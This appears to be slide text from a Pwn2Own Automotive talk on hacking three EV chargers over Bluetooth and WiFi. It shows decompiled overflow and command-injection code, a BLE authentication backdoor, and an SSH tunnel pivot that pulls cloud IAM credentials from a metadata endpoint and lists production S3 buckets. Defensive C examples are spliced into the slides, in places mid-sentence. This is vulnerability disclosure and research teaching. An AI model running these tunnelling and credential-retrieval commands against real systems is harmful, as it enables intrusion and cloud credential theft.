Low Energy to High Energy: Hacking Nearby EV-Chargers Over Bluetooth
Thijs Alkemade & Khaled Nassar, Computest Sector 7

Introduction
  1. Be in Bluetooth/WiFi range
  2. ?
  3. Execute arbitrary code on the charger

About us
  We are:
  - Khaled Nassar (notkmhn)
  - Thijs Alkemade (infosec.exchange/xnyhps)
  - Daan Keuper (daankeuper)
  Working for Computest in The Netherlands

Pwn2Own Automotive
  - First time: January 2024 in Tokyo
  - In scope: Tesla infotainment systems, automotive operating systems, EV chargers

EV chargers
  - Level 2 chargers, targeted at the home market
  - All of them come with these features: connectivity (WiFi/Ethernet), scheduling, usage monitoring
  - Initially, we thought chargers would be well secured: new product category, limited communication interfaces, safety regulations

Smart EV Charging Station with WiFi: JuiceBox 40
JuiceBox 40
  - BLE (provisioning)
  - WiFi
  - Based on the Zentri IoT platform: AMW006 or WGM160P module
  - Both are ARM Cortex-M4 based MCUs
  - Gecko OS 4.2.7 (?)
  - There is an admin interface, with some commands?
  - Accessible in setup mode over HTTP
  - And accessible during standard operation over port 2000, telnet style! No authentication

Zentri DMS
  - Managed IoT platform
  - Specific hardware modules, providing: update management; device identification and authn/authz; core OS + SDK bindings for app development; extensive API
  - JuiceBox runs on an RTOS called "Gecko OS". Note: this OS is EOL!
  - Firmware blobs are downloadable! We could investigate these before the device arrived

JuiceBox 40 (CVE-2024-23938)
  - Gecko OS logs messages when certain events occur
  - It is possible to change the format of these messages using a set variable command
  - Limited to 32 characters per message template, including a terminating NULL byte
  - Support for different formatting tags per event type

    char scratch_buffer[132];
    char formatted_msg_buffer[192];
    char *dst = formatted_msg_buffer;
    /* ... */
    if (format_tag == 't' && print_timestamp_to_string(scratch_buffer, 1) == SUCCESS) {
        memcpy(dst, scratch_buffer, 10);
        dst[10] = ' ';
        dst[11] = '|';
        dst[12] = ' ';
        memcpy(dst + 13, scratch_buffer + 11, 8);
        dst[21] = ':';
        dst[22] = ' ';
        dst = dst + 23;
        *dst = 0;
    }

  - What if we provide multiple 't' tags? At most 15 times, each using up 23 bytes
  - 15 * 23 = 345 bytes, while the stack allocated buffer is 192 bytes long
  - No canaries, no ASLR, but some limitations on allowed byte values

What about BLE?
  - Secondary processor for BLE, communicates with the WGM160P over SPI
  - Exposes a BLE Serial Port Profile service
  - Allows for retrieving and setting system variables
  - Used during provisioning to set WiFi credentials

JuiceBox 40: provisioning mode fallback
  - Deauth the device from the provisioned WiFi AP
  - Device will fall back into provisioning mode!
  - Use BLE SPP service to retrieve/set WiFi credentials!

The "fix"

AC Wallbox Commercial (MAXI US AC W12-L-4G): Autel MaxiCharger
Autel MaxiCharger
  - WiFi, Bluetooth, 4G, Ethernet, RFID, LCD touch screen, RS485 port
  - Runs FreeRTOS
  - Lots of labeled test points (TX/RX)
  - Multiple internal USB ports with unknown purpose, spread out across many components

Autel MaxiCharger
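The CVE-2024-23938 snippet above copies 23 bytes per 't' tag without ever checking how much of the 192-byte destination is left. The block below is an added example, not Gecko OS code or code from the talk: a bounded template expander that enforces the 32-character template limit the slides mention and refuses any expansion that would not fit in the fixed-size buffer. The "%t" tag syntax, the function names and the constant timestamp are assumptions made so the block runs stand-alone.

```c
/* Added example, not code from Gecko OS or from the talk: bounded
 * expansion of a log message template. Every write checks the space that
 * remains in the fixed-size destination, so a template that repeats the
 * timestamp tag is rejected instead of running past the buffer.
 * The "%t" syntax, names and the fixed timestamp are assumptions. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define TEMPLATE_MAX  32   /* per the talk: 32 chars per template incl. NUL */
#define MSG_BUF_LEN   192  /* per the talk: size of the stack buffer       */
#define TIMESTAMP_LEN 23   /* "YYYY-MM-DD | HH:MM:SS: " as laid out on the slide */

/* Stand-in for the OS timestamp routine; a constructed, fixed value. */
static void format_timestamp(char out[TIMESTAMP_LEN + 1]) {
    snprintf(out, TIMESTAMP_LEN + 1, "%s | %s: ", "2024-01-24", "10:30:00");
}

/* Expands `tmpl` into `dst` (capacity `dst_len`). Returns the number of
 * bytes written excluding the NUL, or -1 if the template is over-long or
 * the expansion would not fit. `dst` is NUL-terminated on success. */
int expand_template(const char *tmpl, char *dst, size_t dst_len) {
    if (tmpl == NULL || dst == NULL || dst_len == 0) return -1;
    size_t tlen = strlen(tmpl);
    if (tlen >= TEMPLATE_MAX) return -1;          /* 32 incl. NUL -> at most 31 chars */
    size_t used = 0;
    for (size_t i = 0; i < tlen; i++) {
        if (tmpl[i] == '%' && i + 1 < tlen && tmpl[i + 1] == 't') {
            char ts[TIMESTAMP_LEN + 1];
            format_timestamp(ts);
            size_t n = strlen(ts);
            if (n > dst_len - 1 - used) return -1;  /* the check the original lacks */
            memcpy(dst + used, ts, n);
            used += n;
            i++;                                    /* skip the 't' */
        } else {
            if (dst_len - 1 - used < 1) return -1;
            dst[used++] = tmpl[i];
        }
    }
    dst[used] = '\0';
    return (int)used;
}

int main(void) {
    char buf[MSG_BUF_LEN];
    /* 8 tags (184 bytes) fit; 9 tags (207 bytes) are refused. */
    printf("8 tags -> %d\n", expand_template("%t%t%t%t%t%t%t%t", buf, sizeof buf));
    printf("9 tags -> %d\n", expand_template("%t%t%t%t%t%t%t%t%t", buf, sizeof buf));
    return 0;
}
```

With the slide's numbers, 8 repeated tags produce 184 bytes and still fit, while the ninth would push the output to 207 bytes and is refused; the original code would have kept writing up to 345 bytes into the 192-byte buffer.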
  - Main CPU UART
  - Random internal micro-USB ports?

Getting the firmware
  1. App pairs with the charger
  2. App asks the charger the current version of the firmware for each component
  3. App submits this to a cloud server
  Later:
  1. App asks the server for updates
  2. Server sends back a list of obfuscated URLs for each component that is not up to date
  3. App downloads new files
  4. App transfers files to charger over BLE

Firmware URL obfuscation

    {"fInfo": "AHR0CHM6L79zM75lDS1jZW50CmfsLTeuYW1hEm9uYXDzLmNvBS9kZWZhDWx0LmVuZXb7B2RlDS9mrnAXJtD2f7ZS85MdRkNdYxmMWM=",
     "fileName": "Firmware_ECC0101_V1.35.00.aut",
     "fileSize": 970659,
     "firmwareId": "_UNI_OTA_ECC0101",
     "firmwareName": "Charge Control Module",
     "firmwareVersion": "1.35.00",
     "needReboot": true,
     "note": "",
     "upgradeDuring": 180,
     "upgradeOrder": 5}

  - Is it just base64?
  - Custom base64 alphabet (standard character -> replacement): A -> a, a -> A, B -> b, b -> B, 7 -> y, y -> 7
  - XOR with 256-byte key? Nope
  - Addition instead of XOR? Almost
  - ciphertext = (plaintext XOR key1) + key2

Autel MaxiCharger (CVE-2024-23958)

    if (packet && packet_length == 32) {
        log(A_Ble_Bus, 2, 536, "auth msg\r\n");
        memcpy(appAuthData, packet, sizeof(appAuthData));
        get_password(passwordHashData);
        memcpy(randomNumbers, app_random, 4u);
        memcpy(&randomNumbers[4], charger_random, 4u);
        retrieveAuthToken(randomNumbers, passwordHashData, cpAuthData);
        for (k = 0; k ...

    if (response[12])
        response[12] = 0;
    sha256(backdoorToken, 0x20u, hashed, 0);
    sha256(hashed, 0x20u, hashed, 0);
    sha256(hashed, 0x20u, hashed, 0);
    memcpy(backdoorToken, hashed, sizeof(backdoorToken));
    retrieveCpAuthData(randomNumbers, backdoorToken, cpAuthData);
    for (m = 0; m ...
    "authentication succ, %d\r\n", v15);
    log(A_Ble_Bus, 2, 641, "authbd succ\r\n");

  - Authentication "backdoor"

Autel MaxiCharger (CVE-2024-23959): post-authentication buffer overflow

    char stack_buffer[60];  // [sp+50h] [bp-120h] BYREF
    bzero(stack_buffer, 60);
    if (a1) {
        ...
    } else {
        qmemcpy(v13, (int *)aU, sizeof(v13));
        sub_80C38D4(v13, 17);
        memcpy(stack_buffer, ble_buffer, ble_buffer_length);
        os_printf_maybe(byte_80F4768);
        os_printf_maybe("chargingCtrlParam.chargingCtrl=0x%x\r\n", *(_DWORD *)stack_buffer);
        os_printf_maybe("chargingCtrlParam.chargingMode=0x%x\r\n", *(_DWORD *)&stack_buffer[4]);
        os_printf_maybe("chargingCtrlParam.chargingParam=%d\r\n", *(_DWORD *)&stack_buffer[8]);
        os_printf_maybe("chargingCtrlParam.accountBalance=%d\r\n", *(_DWORD *)&stack_buffer[12]);
        ...

Autel MaxiCharger: binary exploitation on easy mode
  - No stack canaries
  - No ASLR
  - No limitations on character set
  - Many saved registers on the stack
  - Since it's FreeRTOS, cleanup and continuation was the only challenging part

Autel MaxiCharger (CVE-2024-23967): buffer overflow when decoding base64

    char base64_decoded[1024];  // [sp+B0h] [bp-418h] BYREF
    initialize_string(data);
    v7 = parse_json_message(a1, a2, v26, a4, v24, data);
    if (string_equal(v26, "Reboot")) {
        ...
    }
    if (v7 == 1) {
        c_string = get_c_string(data);
        os_printf_maybe("strData:%s", c_string);
        memset(base64_decoded, 0, sizeof(base64_decoded));
        data_string = (char *)get_c_string(data);
        data_base64_decode(data_string, base64_decoded);
        os_printf_maybe("data_base64_decode:%s", base64_decoded);

ChargePoint Home Flex
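Both Autel overflows above have the same root cause: `memcpy(stack_buffer, ble_buffer, ble_buffer_length)` and `data_base64_decode(data_string, base64_decoded)` are handed a destination without its capacity. The block below is an added example, not Autel's code or the talk's: a base64 decoder that validates the input and computes the decoded size before writing, and refuses rather than truncates or overflows when the caller's buffer is too small. The function names are assumptions; the input is the standard alphabet, not the custom one used for the firmware URLs.

```c
/* Added example, not Autel's code: base64 decoding with the output
 * capacity passed in and checked up front. Rejects malformed input
 * (bad length, stray characters, misplaced padding) and never writes
 * more than `out_cap` bytes. Names are assumptions. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

static int b64_value(char c) {
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    if (c == '+') return 62;
    if (c == '/') return 63;
    return -1;
}

/* Decodes NUL-terminated `in` into `out` (capacity `out_cap`).
 * Returns the decoded length, or -1 on malformed input or when the
 * decoded data would not fit. */
long b64_decode_bounded(const char *in, uint8_t *out, size_t out_cap) {
    size_t in_len = strlen(in);
    if (in_len % 4 != 0) return -1;               /* base64 comes in whole quads */
    size_t pad = 0;
    if (in_len >= 1 && in[in_len - 1] == '=') {
        pad = 1;
        if (in_len >= 2 && in[in_len - 2] == '=') pad = 2;
    }
    size_t need = in_len / 4 * 3 - pad;
    if (need > out_cap) return -1;                /* the check the charger's decoder lacks */

    size_t o = 0;
    for (size_t i = 0; i < in_len; i += 4) {
        uint32_t acc = 0;
        for (int k = 0; k < 4; k++) {
            char c = in[i + k];
            int v;
            if (c == '=') {
                /* '=' is only valid in the last `pad` positions of the final quad */
                if (i + 4 != in_len || (size_t)k < 4 - pad) return -1;
                v = 0;
            } else {
                v = b64_value(c);
                if (v < 0) return -1;
            }
            acc = (acc << 6) | (uint32_t)v;
        }
        uint8_t bytes[3] = { (uint8_t)(acc >> 16), (uint8_t)(acc >> 8), (uint8_t)acc };
        size_t take = (i + 4 == in_len) ? 3 - pad : 3;
        memcpy(out + o, bytes, take);             /* o + take <= need <= out_cap */
        o += take;
    }
    return (long)o;
}
```

The capacity check happens before any byte is written, so a caller that passes `sizeof(base64_decoded)` gets a clean failure for oversized messages instead of a stack corruption; the same "size first, then copy" shape is what the `chargingCtrlParam` handler needed for `ble_buffer_length`.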
  - BT + BLE (provisioning)
  - WiFi
  - Runs Linux
  - 2018: Kaspersky Lab report

ChargePoint Home Flex: getting firmware
  - JTAG + gdb to get U-Boot shell
  - Modify kernel boot args to use /bin/sh as init
  - Dump block devices with netcat
  - Data flow through IPC to other services

ChargePoint Home Flex: command injection in wlanapp

    snprintf(command, 0x100u,
             "/usr/sbin/wpa_passphrase %s %s | grep psk= | tail -1 | cut -c6-",
             &msg->ssid, &msg->password);
    popen_res = popen(command, "r");

ChargePoint Home Flex: provisioning mode fallback
  - Exactly the same as the JuiceBox 40

New bug
  - We wanted a new bug, probably had to be something using WiFi
  - Only two connections: TLS (OCPP) to the management server, and outgoing SSH
  - SSH was very interesting, but we'll cover that later!

ChargePoint Home Flex: /opt/etc/coul/cps.conf

    Url=https://172.16.110.201:343/gs/pgm.php
    WsUrl=wss://homecharger-:443/ws-prod/panda/v1
    WsKey=/var/config/.keys/ca.crt
    AuthUrl=https://172.16.50.197:343/gs/pgm
    KioskUrl=http://172.31.254.10:80/gsemb_in/pgm.php
    CACertificateFile=/var/config/.keys/ca.crt
    CertificateFile=/var/config/.keys/system.crt
    KeyFile=/var/config/.keys/system.key
    KeyType=PEM
    VerifyHostName=1
    MaxEnqueueFailures=40

  - CURLOPT_SSL_VERIFYHOST is a "footgun" in curl: 0 = disabled; 1 = disabled, but with some logging; 2 = enabled
  - This is indeed what the charger used: it only verified that the certificate of the OCPP server was issued by ChargePoint's own root, not that it matched the domain
  - Georgiev, Martin, Subodh Iyengar, Suman Sekhar Jana, Rishita Anubhai, Dan Boneh and Vitaly Shmatikov. "The most dangerous code in the world: validating SSL certificates in non-browser software." Proceedings of the 2012 ACM conference on Computer and communications security (2012): n. pag.

Pwn2Own CTF edition
  Made possible by: ChargePoint Home Flex

ChargePoint Home Flex

    [2, "1706198695", "DataTransfer", {"vendorId": "ChargePoint", "data": "saddr|1|3508|1706198695|0|1|1706198695|homecharger-:443/ws-prod/panda/v1 "}]

    if (command_id == 701) {
        v91 = payload[136];
        v92 = s;
        strcpy((char *)s, "NA");
        if (v91)
            v92 = payload + 136;
        cmd = payload + 36;
        CTLogWhere(5, "RouteToFsmInstance", 4105, 0x4000, "\n*Executing BOOTCONTROL cmd %s\n", cmd);
        v94 = strstr(cmd, "reboot");
        type = "reboot";
        if (!v94)
            type = "bankswitch";
        recordReboot(v92, type, "NOC", 0, 1);
        system(cmd);

  - Worth it: the exploit worked and was not a duplicate!
  - Probably the fastest developed Pwn2Own exploit in recent years: 12 hours from finding the vulnerability to demonstrating it on stage
  - This was fun, but then we realise we're way out of scope, no closer to finding a useful vulnerability, and not familiar with the hacking laws in Japan

Impact: LAN access
  - Hacking a charger over BLE allows pivoting to the LAN
  - Could make a botnet too

Impact: bypass safety controls
  - All chargers had separate power controllers: scheduled charging, limit maximum current, high temperature shutdown
  - Modifying this firmware could allow damaging the charger
  - On the Autel, this firmware could be updated!

Impact: fraud
  - Chargers with payment functionality could be exploited for financial gain: overcharge for energy
  - The Autel has "Home Charger Sharing" functionality
  - Only the charger determines the amount billed!

Impact: disruption
  - Compromising chargers at a large scale could have impact on
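The wlanapp snippet above builds a shell pipeline with `snprintf` and hands it to `popen`, so every byte of the SSID and passphrase is parsed as shell syntax. The block below is an added example, not ChargePoint's code: it runs a helper through `fork`/`execv` with the user-controlled values as separate argv entries, so there is no shell to interpret them, and post-processes the output in C instead of piping through `grep`/`tail`/`cut`. `/bin/echo` stands in for `wpa_passphrase` so the block runs anywhere; the wrapper name and argument layout are assumptions. The BOOTCONTROL handler's `system(cmd)` is the same class of bug, but for a command that arrives from the management server the fix is to dispatch on a fixed set of actions (reboot, bankswitch) rather than to execute the string at all.

```c
/* Added example, not ChargePoint's code: invoke an external helper
 * without a shell. The argv strings are passed verbatim to the program,
 * so shell metacharacters in an SSID or passphrase have no meaning.
 * /bin/echo stands in for the real helper; names are assumptions. */
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Runs argv[0] with the given argv (no shell) and captures its stdout into
 * `out` (capacity out_cap, NUL-terminated). Returns the child's exit
 * status (0..255) or -1 on failure. */
int run_capture(char *const argv[], char *out, size_t out_cap) {
    int fds[2];
    if (out_cap == 0 || pipe(fds) != 0) return -1;
    pid_t pid = fork();
    if (pid < 0) { close(fds[0]); close(fds[1]); return -1; }
    if (pid == 0) {
        dup2(fds[1], STDOUT_FILENO);
        close(fds[0]); close(fds[1]);
        execv(argv[0], argv);   /* argv is passed as-is: no word splitting, no pipes, no quoting */
        _exit(127);
    }
    close(fds[1]);
    size_t used = 0;
    for (;;) {
        ssize_t n = read(fds[0], out + used, out_cap - 1 - used);
        if (n <= 0) break;
        used += (size_t)n;
        if (used == out_cap - 1) {      /* buffer full: drain the rest so the child can exit */
            char sink[256];
            while (read(fds[0], sink, sizeof sink) > 0) {}
            break;
        }
    }
    close(fds[0]);
    out[used] = '\0';
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Shape of the wlanapp helper call without the shell pipeline: ssid and
 * passphrase are separate argv entries; the output is trimmed in C.
 * With /bin/echo as the helper the result is simply the joined arguments. */
int derive_psk_line(const char *ssid, const char *passphrase, char *out, size_t out_cap) {
    char *argv[] = { "/bin/echo", (char *)ssid, (char *)passphrase, NULL };
    int rc = run_capture(argv, out, out_cap);
    size_t len = strlen(out);
    if (len > 0 && out[len - 1] == '\n') out[len - 1] = '\0';   /* strip trailing newline */
    return rc;
}

int main(void) {
    char line[256];
    int rc = derive_psk_line("ssid; echo injected", "pass|word", line, sizeof line);
    printf("rc=%d output=[%s]\n", rc, line);   /* the '; echo' and '|' stay literal text */
    return 0;
}
```

The test feeds an SSID containing `; echo injected` and a passphrase containing `|`; with `popen` those would have ended the command and started a pipeline, while here they come back unchanged as plain argument text.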
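The cps.conf above sets `VerifyHostName=1`, which in libcurl terms is `CURLOPT_SSL_VERIFYHOST` at 1: the chain is checked against ChargePoint's root, but nothing checks that the certificate was issued for the OCPP server's name, so any certificate from that root would do. The block below is an added example, not ChargePoint's or curl's code: it models the two halves of peer verification (chain validity and name binding) and a hostname matcher with the usual wildcard rules, so the difference between level 1 and level 2 is visible in code. Host and certificate names are constructed under `.example.test`; on the libcurl side the fix is `curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 2L)`.

```c
/* Added example, not ChargePoint's or libcurl's code: what "verify the
 * host name" actually checks, and what VERIFYHOST < 2 skips.
 * Names and the helper functions are assumptions. */
#include <ctype.h>
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Case-insensitive equality; DNS names are case-insensitive. */
static bool ci_equal(const char *a, const char *b) {
    for (; *a && *b; a++, b++)
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b)) return false;
    return *a == '\0' && *b == '\0';
}

/* Does `host` match the certificate name `pattern`? Either an exact match
 * or a "*." wildcard in the leftmost label only, matching exactly one
 * non-empty label and never something as broad as "*.test". */
bool hostname_matches(const char *pattern, const char *host) {
    if (!pattern || !host || !*pattern || !*host) return false;
    if (pattern[0] == '*' && pattern[1] == '.') {
        const char *suffix = pattern + 1;                   /* ".example.test" */
        if (strchr(suffix + 1, '.') == NULL) return false;  /* refuse "*.test" */
        const char *dot = strchr(host, '.');
        if (dot == NULL || dot == host) return false;       /* need one non-empty leftmost label */
        return ci_equal(suffix, dot);                       /* the remaining labels must match exactly */
    }
    return ci_equal(pattern, host);
}

/* Models TLS peer acceptance. `chain_ok` is the outcome of chain/issuer
 * validation (CURLOPT_SSL_VERIFYPEER); `names` are the certificate's DNS
 * names; `verifyhost` mirrors CURLOPT_SSL_VERIFYHOST. */
bool peer_accepted(bool chain_ok, const char *const *names, size_t n_names,
                   const char *host, long verifyhost) {
    if (!chain_ok) return false;
    if (verifyhost < 2) return true;     /* 0 or 1: any cert from the trusted root is accepted */
    for (size_t i = 0; i < n_names; i++)
        if (hostname_matches(names[i], host)) return true;
    return false;
}
```

With a certificate for `other-device.example.test` issued by the trusted root, `peer_accepted` says yes at level 1 and no at level 2 for a connection to `ocpp.example.test`; that gap is exactly what let the charger talk to a server that was not the real OCPP endpoint.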
    the energy grid

Takeaways: hardware security research
  - Getting firmware is essential
  - Non-invasive: online reconnaissance, network analysis
  - Invasive: dumping external storage (in-circuit, desoldering), using enabled debug ports
  - Explore debugging functionality exhaustively: JTAG/SWD, built into firmware, fault handlers, custom protocols/interfaces
  - Consider similar (cheap) devices or dev-kits
  - Invest in a remotely accessible setup: smart plugs for power control, webcam for monitoring, separately managed network(s); optional: smoke detector + smart plug combo
  - And most importantly, invest in the right tools
  - A fantastic introductory hardware lab setup article by Bishop Fox: https:/

Takeaways: provisioning
  - For most chargers, attention was paid to the network attack surface
  - Attack surfaces involving the (re)provisioning process are underexamined: Bluetooth, bad state transitions
  - This probably applies to many IoT devices
  - Provisioning should be investigated early on in the design phase
  - Re-provisioning should be considered within the context of a reasonable attacker model

https:/putest.nl  sector7_nl

Oh, about that SSH connection...
    #!/bin/sh
    # Bring up pinned up reverse tunnel to mothership. Try forever, but back off
    # connection attempts to keep from wasting resources. Peg the retry time at
    # some max and keep trying.
    SERIAL_NUM=`cat /var/config/cs_sn`
    SN_YEAR=`echo $SERIAL_NUM | head -c 2`
    BASE_SERVER_PORT=20000
    BASE_SERIAL=0
    SERIAL_MODULO=10000
    SERIAL_MINOR=`expr $SERIAL_NUM % $SERIAL_MODULO`
    REVPORT=`expr $SERIAL_MINOR - $BASE_SERIAL`
    REVPORT=`expr $REVPORT + $BASE_SERVER_PORT`
    # FOR QA server please uncomment this line
    #REVSYSTEM=pandagateway.ev-
    REVSYSTEM=
    REVSYSTEMPORT="-p 343"
    REVHOST=pandart$REVSYSTEM
    REVHOST_2016=
    # For 2017
    REVHOST_2017=...
    while true; do
        ...
        # Connect to the appropriate server based on the year code in the serial number.
        if [ $SN_YEAR = 17 ]; then
            # Connect to the 2017 server.
            #printf "Connecting to 2017 server: $REVHOST_2017\n"
            $LOG "attempting connection to $REVHOST_2017"
            ssh -o StrictHostKeyChecking=no -o ExitOnForwardFailure=yes $REVSYSTEMPORT -N -T -R $REVPORT:localhost:23 $REVHOST_2017 &
        ...

ChargePoint Home Flex

    ssh -o StrictHostKeyChecking=no -o ExitOnForwardFailure=yes -p 343 -N -T -R $REVPORT:localhost:23

ChargePoint Home Flex

    ssh -o StrictHostKeyChecking=no -o ExitOnForwardFailure=yes -p 343 -N -T -L 1337:127.0.0.1:20023

ChargePoint Home Flex

    ssh -o StrictHostKeyChecking=no -o ExitOnForwardFailure=yes -p 343 -N -T -L 1337:80

ChargePoint Home Flex

    ssh -o StrictHostKeyChecking=no -o ExitOnForwardFailure=yes -p 343 -N -T -L 1337:169.254.169.254:80

ChargePoint Home Flex

    $ curl http://localhost:1337/latest/meta-data/iam/security-credentials/cp-prod-ota-servers-role
    {"Code": "Success", "LastUpdated": "2024-01-25T20:21:21Z", "Type": "AWS-HMAC", "AccessKeyId": "ASIAQKPTIBNKQN2DLSML", "SecretAccessKey": "", "Token": "", "Expiration": "2024-01-26T02:28:42Z"}

    $ aws s3 ls
    2020-03-27 16:17:02 aws-athena-query-results-022521842517-ca-central-1
    2019-07-17 19:23:19 aws-athena-query-results-022521842517-eu-central-1
    2020-06-26 07:15:33 aws-athena-query-results-022521842517-us-west-2
    2022-09-21 08:52:30 aws-cloudtrail-logs-022521842517-c3dfcdde-debug-datalake
    2022-01-20 14:21:52 aws-glue-assets-022521842517-us-west-2
    2020-06-26 07:53:11 aws-glue-scripts-022521842517-us-west-2
    2020-06-26 07:57:20 aws-glue-temporary-022521842517-us-west-2
    2020-06-17 04:15:13 cf-templates-aws-deployer-2-cp-prod-ap-southeast-2
    2020-06-10 04:11:10 cf-templates-aws-deployer-2-cp-prod-ca-central-1
    2020-06-23 04:10:57 cf-templates-aws-deployer-2-cp-prod-eu-central-1
    2020-06-17 04:15:13 cf-templates-aws-deployer-cp-prod-ap-southeast-2
    2020-06-23 04:10:57 cf-templates-aws-deployer-cp-prod-eu-central-1
    2020-07-01 13:45:27 cf-templates-aws-deployer-cp-prod-us-east-1
    2020-06-26 12:17:56 cf-templates-aws-deployer-cp-prod-us-west-2
    2020-06-17 04:16:26 cf-templates-fg3iuljzn1mh-ap-southeast-2
    2020-06-10 04:11:28 cf-templates-fg3iuljzn1mh-ca-central-1
    2020-06-23 04:12:10 cf-templates-fg3iuljzn1mh-eu-central-1
    2020-06-18 03:55:58 cf-templates-fg3iuljzn1mh-us-east-2
    2020-06-26 12:23:09 cf-templates-fg3iuljzn1mh-us-west-2
    2020-06-27 08:06:20 config-bucket-cp-prod
    2019-07-19 11:36:28 cp-infra-logs
    2020-07-02 15:38:44 cp-prod-022521842517-cloudtrail-logs
    2020-03-27 10:51:52 cp-prod-ca-datalake
    2022-02-17 01:52:33 cp-prod-cardconf
    2020-06-27 08:26:51 cp-prod-datalake-build-artifacts
    2021-08-18 02:19:20 cp-prod-fra-nos-notification-configuration
    2022-02-24 09:36:38 cp-prod-fra-nos-pricing
    2022-04-02 23:15:49 cp-prod-fra-nos-reports
    ...